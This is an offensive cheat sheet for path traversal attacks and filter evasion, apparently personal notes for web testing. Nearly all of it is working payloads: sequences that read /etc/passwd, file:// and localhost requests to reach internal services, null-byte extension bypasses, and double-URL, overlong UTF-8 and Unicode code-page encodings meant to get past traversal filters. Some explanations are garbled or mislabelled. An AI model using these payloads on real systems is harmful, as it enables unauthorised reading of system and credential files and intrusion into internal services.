Directory Traversal Injection Technique & Evasion
- Finding Path Traversal
Check Files loaded (If the are loaded from server reference)
/image?filename=28.jpg- Technique
# Use nested traversal
....//
....\/
.|./
## System Specific
Unix-like OS:
root directory: /
directory separator: /
Windows OS:
root directory: <drive letter>:
directory separator: \ or /
----------------------------------------------------------------------------------
# Use ? has character
- ? main any character (like in linux)
----------------------------------------------------------------------------------
# Start with the base file and traverse from there
- filename=/var/www/images/../../../etc/passwd
- filename=/etc/passwd
- file=file:///etc/passwd
- file=http://localhost:8080 ---> Fetching Local Services
- file=http://192.168.0.2:9080 ---> Fetching Local Services
----------------------------------------------------------------------------------
# Bypass the requirement to end with a file extension by using a null byte
filename=../../../etc/passwd%00.png
filename=../../../etc/passwd.ANY%00.png
----------------------------------------------------------------------------------
# Encoding
- 16-bit ---> ../ ---> %2e%2e%2f
- Double URL ---> ../ ---> %252e%252e%252f
- UTF-8 ---> ..%c0%af & ..%ef%bc%8f
- Unicode
## Example (URL)
- . & %00
- %2e%2e%2f ---> ../
- %2e%2e/ ---> ../
- ..%2f ---> ../
- %2e%2e%5c ---> ..\
- %2e%2e\ ---> ..\
- ..%5c ---> ..\
- %252e%252e%255c ---> ..\
- ..%255c ---> ..\
- ...
## Example (UTF-8)
..%c0%af ---> ../
..%c1%9c ---> ..\
## Unicode
Code Page Unicode Character Hexadecimal Equivalent
----------------------------------------------------------
874 U+FF0F / 0x002F (/)
874 U+FF3C \ 0x005C (\)
932 U+00A5 ¥ 0x005C (\)
949 U+20A9 ₩ 0x005C (\)
1250 U+2044 ⁄ 0x002F (/)
1250 U+2215 ∕ 0x002F (/)
1250 U+2216 ∖ 0x005C (\)
1250 U+FF0F / 0x002F (/)
1250 U+FF3C \ 0x005C (\)
1251 U+FF0F / 0x002F (/)
1251 U+FF3C \ 0x005C (\)
1252 U+2044 ⁄ 0x002F (/)
... ... ... ...
More details: https://worst.fit/mapping/#ANSI:0x5C,0x2F